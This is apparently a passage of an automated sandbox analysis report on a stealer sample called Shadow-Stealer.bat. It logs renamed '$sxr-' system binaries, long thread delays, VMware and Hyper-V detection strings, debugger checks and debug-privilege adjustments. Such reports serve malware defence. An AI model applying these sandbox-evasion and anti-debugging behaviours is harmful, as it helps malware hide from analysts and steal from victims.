            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\$sxr-powershell.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\System32\cmd.exe File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: c:\windows\$sxr-powershell.exe Key value queried: Powershell behavior
            Source: c:\users\user\desktop\shadow-stealer.bat.exe Key value queried: Powershell behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe TID: 6264 Thread sleep count: 4668 > 30
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe TID: 6264 Thread sleep count: 4876 > 30
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe TID: 5788 Thread sleep time: -11990383647911201s >= -30000s
            Source: C:\Windows\$sxr-powershell.exe TID: 5644 Thread sleep time: -11068046444225724s >= -30000s
            Source: C:\Windows\$sxr-powershell.exe TID: 4568 Thread sleep count: 363 > 30
            Source: C:\Windows\$sxr-powershell.exe TID: 2988 Thread sleep count: 97 > 30
            Source: C:\Windows\$sxr-powershell.exe TID: 3392 Thread sleep count: 106 > 30
            Source: C:\Windows\System32\winlogon.exe TID: 6924 Thread sleep count: 3805 > 30
            Source: C:\Windows\System32\winlogon.exe TID: 6924 Thread sleep time: -3805000s >= -30000s
            Source: C:\Windows\System32\winlogon.exe TID: 6924 Thread sleep count: 6191 > 30
            Source: C:\Windows\System32\winlogon.exe TID: 6924 Thread sleep time: -6191000s >= -30000s
            Source: C:\Windows\System32\lsass.exe TID: 3088 Thread sleep count: 9969 > 30
            Source: C:\Windows\System32\lsass.exe TID: 3088 Thread sleep time: -9969000s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 432 Thread sleep count: 239 > 30
            Source: C:\Windows\System32\svchost.exe TID: 432 Thread sleep time: -239000s >= -30000s
            Source: C:\Windows\System32\dwm.exe TID: 5352 Thread sleep count: 8989 > 30
            Source: C:\Windows\System32\dwm.exe TID: 5352 Thread sleep time: -8989000s >= -30000s
            Source: C:\Windows\System32\dwm.exe TID: 5352 Thread sleep count: 871 > 30
            Source: C:\Windows\System32\dwm.exe TID: 5352 Thread sleep time: -871000s >= -30000s
            Source: C:\Windows\SysWOW64\cscript.exe TID: 5368 Thread sleep count: 108 > 30
            Source: C:\Windows\SysWOW64\cscript.exe TID: 5368 Thread sleep time: -108000s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 2672 Thread sleep count: 119 > 30
            Source: C:\Windows\System32\svchost.exe TID: 2672 Thread sleep time: -119000s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 776 Thread sleep count: 121 > 30
            Source: C:\Windows\System32\svchost.exe TID: 776 Thread sleep time: -121000s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 2872 Thread sleep count: 100 > 30
            Source: C:\Windows\System32\svchost.exe TID: 2872 Thread sleep time: -100000s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 4092 Thread sleep count: 101 > 30
            Source: C:\Windows\System32\svchost.exe TID: 4092 Thread sleep time: -101000s >= -30000s
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe TID: 5840 Thread sleep count: 104 > 30
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe TID: 5840 Thread sleep time: -104000s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 5064 Thread sleep count: 56 > 30
            Source: C:\Windows\System32\svchost.exe TID: 5064 Thread sleep time: -56000s >= -30000s
            Source: C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe TID: 5336 Thread sleep time: -92000s >= -30000s
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\$sxr-powershell.exe Last function: Thread delayed
            Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
            Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
            Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\$sxr-powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Window / User API: threadDelayed 4668
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exe Window / User API: threadDelayed 4876
            Source: C:\Windows\$sxr-powershell.exe Window / User API: threadDelayed 5359
            Source: C:\Windows\$sxr-powershell.exe Window / User API: threadDelayed 2914
            Source: C:\Windows\$sxr-powershell.exe Window / User API: threadDelayed 363
            Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 3805
            Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 6191
            Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 9969
            Source: C:\Windows\System32\dwm.exe Window / User API: threadDelayed 8989
            Source: C:\Windows\System32\dwm.exe Window / User API: threadDelayed 871
            Source: C:\Windows\SysWOW64\dllhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\System32\dllhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\$sxr-mshta.exe API coverage: 9.6 %
            Source: C:\Windows\$sxr-cmd.exe API coverage: 7.9 %
            Source: C:\Windows\$sxr-powershell.exe API coverage: 2.9 %
            Source: C:\Windows\System32\lsass.exe API coverage: 9.1 %
            Source: C:\Windows\System32\svchost.exe API coverage: 6.9 %
            Source: C:\Windows\SysWOW64\cscript.exe API coverage: 5.2 %
            Source: C:\Windows\$sxr-mshta.exe Memory allocated: 1ACE86E0000 memory reserve | memory write watch
            Source: C:\Windows\$sxr-mshta.exe Memory allocated: 1ACE8930000 memory commit | memory reserve | memory write watch
            Source: C:\Windows\$sxr-mshta.exe Memory allocated: 1ACE8AD0000 memory commit | memory reserve | memory write watch
            Source: C:\Windows\$sxr-mshta.exe Memory allocated: 1ACE8B10000 memory reserve | memory write watch
            Source: C:\Windows\System32\lsass.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
            Source: C:\Windows\System32\dwm.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
            Source: C:\Windows\System32\svchost.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
            Source: C:\Windows\System32\winlogon.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
            Source: C:\Windows\SysWOW64\dllhost.exe API call chain: ExitProcess graph end node
            Source: C:\Windows\$sxr-mshta.exe File opened: C:\Users\user\AppData
            Source: C:\Windows\$sxr-mshta.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
            Source: C:\Windows\$sxr-mshta.exe File opened: C:\Users\user
            Source: C:\Windows\$sxr-mshta.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
            Source: C:\Windows\$sxr-mshta.exe File opened: C:\Users\user\AppData\Roaming
            Source: C:\Windows\$sxr-mshta.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
            Source: lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicshutdownNT SERVICE
            Source: dwm.exe, 0000001A.00000000.2491407917.000001D156AA0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000gB
            Source: lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicvssNT SERVICE
            Source: dllhost.exe, 00000008.00000002.2310298135.0000015FDDFE1000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000008.00000002.2310433319.0000015FDE220000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000009.00000002.2310743730.0000000003650000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000009.00000002.2310637736.000000000327E000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000009.00000003.2309620306.000000000327C000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.2362429913.0000021EA07F1000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.2362615637.0000021EA0AB0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000C.00000002.2363058947.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000C.00000002.2363307282.00000000031E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000C.00000003.2361922894.0000000002CDC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hgfsrSDsof=dVx
            Source: Shadow-Stealer.bat Binary or memory string: %twJz:uwJzjJyaUpcyiwGBaxyLIfqozaqDUqkKRqaiFgVVIunfLkwIqCzoZaandvairVgBfqFQwyWUBCcnQmDoDJmqQWKRpLdkgMCNnLauFDmRHGNxYMxQPKDIHNJjHMBJvKMOana=%"tnfLkvIrCz%jJya%"hgfsr"
            Source: svchost.exe, 00000026.00000002.3362805756.00000200A122B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
            Source: svchost.exe, 00000023.00000000.2515680028.000001A1CA000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
            Source: lsass.exe, 00000018.00000002.3361810056.000002D6F064E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pL;VMWare
            Source: lsass.exe, 00000018.00000000.2485686627.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
            Source: $sxr-mshta.exe, 0000000A.00000002.3379935784.000001ACE8C8B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}%
            Source: dwm.exe, 0000001A.00000002.3398038985.000001D156B0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: lsass.exe, 00000018.00000000.2485608595.000002D6F0613000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000018.00000002.3361004221.000002D6F0613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2488659934.0000014E41C13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3360601576.0000014E41C13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.2512834332.0000023C9FE2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.3388959733.0000023C9FE2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.2515792701.000001A1CA034000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3361889502.000001A1CA02A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.3363095469.00000200A1241000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000000.2527765521.00000200A1241000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: svchost.exe, 00000019.00000002.3360601576.0000014E41C13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_000001ACEA2DBEDC FindFirstFileExW,10_2_000001ACEA2DBEDC
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_000002155A5BBEDC FindFirstFileExW,13_2_000002155A5BBEDC
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137F823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,13_2_00007FF7137F823C
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137F2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,13_2_00007FF7137F2978
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF713807B4C FindFirstFileW,FindNextFileW,FindClose,13_2_00007FF713807B4C
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,13_2_00007FF7137E35B8
            Source: C:\Windows\$sxr-cmd.exeCode function: 13_2_00007FF7137E1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,13_2_00007FF7137E1560
            Source: C:\Windows\$sxr-powershell.exeCode function: 19_2_000001F5FDC7BEDC FindFirstFileExW,19_2_000001F5FDC7BEDC
            Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000002D0165EBEDC FindFirstFileExW,22_2_000002D0165EBEDC
            Source: C:\Windows\System32\lsass.exeCode function: 24_2_000002D6F151BEDC FindFirstFileExW,24_2_000002D6F151BEDC
            Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000014E41FDBEDC FindFirstFileExW,25_2_0000014E41FDBEDC
            Source: C:\Windows\System32\dwm.exeCode function: 26_2_000001D15B49BEDC FindFirstFileExW,26_2_000001D15B49BEDC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_009F9AE0 FindFirstFileExW,28_2_009F9AE0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00A19AE0 FindFirstFileExW,28_2_00A19AE0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B19AE0 FindFirstFileExW,28_2_00B19AE0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B39AE0 FindFirstFileExW,28_2_00B39AE0
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_00007FF64E1D1008 GetVersion,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,FreeLibrary,RegOpenKeyExA,RegQueryValueExA,ExpandEnvironmentStringsA,LoadLibraryA,RegCloseKey,GetModuleHandleW,GetProcAddress,MultiByteToWideChar,UnregisterApplicationRestart,GetProcAddress,FreeLibrary,RegCloseKey,10_2_00007FF64E1D1008
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_009D0CE3 mov eax, dword ptr fs:[00000030h]28_2_009D0CE3
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_009D75D8 mov eax, dword ptr fs:[00000030h]28_2_009D75D8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_009D87F7 mov eax, dword ptr fs:[00000030h]28_2_009D87F7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_009F18E3 mov eax, dword ptr fs:[00000030h]28_2_009F18E3
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_009F81D8 mov eax, dword ptr fs:[00000030h]28_2_009F81D8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_009F93F7 mov eax, dword ptr fs:[00000030h]28_2_009F93F7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00A118E3 mov eax, dword ptr fs:[00000030h]28_2_00A118E3
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00A181D8 mov eax, dword ptr fs:[00000030h]28_2_00A181D8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00A193F7 mov eax, dword ptr fs:[00000030h]28_2_00A193F7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00A30CE3 mov eax, dword ptr fs:[00000030h]28_2_00A30CE3
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00A375D8 mov eax, dword ptr fs:[00000030h]28_2_00A375D8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00A387F7 mov eax, dword ptr fs:[00000030h]28_2_00A387F7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00AF0CE3 mov eax, dword ptr fs:[00000030h]28_2_00AF0CE3
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00AF75D8 mov eax, dword ptr fs:[00000030h]28_2_00AF75D8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00AF87F7 mov eax, dword ptr fs:[00000030h]28_2_00AF87F7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B118E3 mov eax, dword ptr fs:[00000030h]28_2_00B118E3
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B181D8 mov eax, dword ptr fs:[00000030h]28_2_00B181D8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B193F7 mov eax, dword ptr fs:[00000030h]28_2_00B193F7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B318E3 mov eax, dword ptr fs:[00000030h]28_2_00B318E3
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B381D8 mov eax, dword ptr fs:[00000030h]28_2_00B381D8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_00B393F7 mov eax, dword ptr fs:[00000030h]28_2_00B393F7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_02DC87F7 mov eax, dword ptr fs:[00000030h]28_2_02DC87F7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_02DC0CE3 mov eax, dword ptr fs:[00000030h]28_2_02DC0CE3
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 28_2_02DC75D8 mov eax, dword ptr fs:[00000030h]28_2_02DC75D8
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\$sxr-mshta.exeCode function: 10_2_000001ACEA2D7F10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_000001ACEA2D7F10
            Source: C:\Windows\System32\dllhost.exeCode function: 8_2_0000000140001368 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,K32EnumProcesses,OpenProcess,K32EnumProcessModules,ReadProcessMemory,CloseHandle,FindCloseChangeNotification,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,8_2_0000000140001368
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Shadow-Stealer.bat.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\dllhost.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\dllhost.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\dllhost.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\dllhost.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\$sxr-powershell.exeProcess token adjusted: DebugJump to behavior
